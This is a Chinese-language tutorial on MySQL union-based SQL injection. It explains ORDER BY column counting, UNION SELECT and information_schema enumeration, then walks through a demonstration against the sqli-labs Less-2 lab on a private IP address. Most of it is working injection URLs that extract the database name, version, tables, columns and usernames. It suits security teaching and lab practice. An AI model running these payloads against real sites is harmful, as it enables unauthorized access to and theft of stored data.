一、常用命令及函数
1、order by排序,获取数据有几个字段,后面小于等于字段数,都会返回结果,大于字段数返回错误
select * from users order by 3;
2、union select联合查询,后边必须跟一样的字段数
select * from users union select 1,2,5;
3、user()查看当前mysql用户
4、version()查看mysql版本信息
5、database()查看当前数据库名
select * from users union select user(),version(),database();
二、跨库查询
1、获取aiyou数据库中表
select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou";
2、获取下一个表格
select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou" limit 0,1; select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou" limit 1,1; select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou" limit 2,1;
3、获取字段名
select * from users union select 1,2,column_name from information_schema.columns where table_name="bucuo";
4、获取字段内容
select * from users union select 1,2,username from users;
三、实例演示(sqli环境)
1、判断表有多少字段,order by 3返回正常,所以有三个字段
http://192.168.139.129/sqli/Less-2/?id=1 order by 3
2、联合查询可以显示的数列,让前面的select语句报错,才能执行后面的select语句
http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,3
3、获取数据库名字和版本信息,因为1不能显示,所以将2和3替换为version(),database()
http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,version(),database()
4、获取数据库security的表
http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema="security"
获取第二个表、第三个表
http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema="security" limit 1,1 --
5、获取表名为users的字段名
http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name="users" http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name="users" limit 1,1 --
6、获取字段内容
http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,username from users http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,username from users limit 1,1 --
禁止非法,后果自负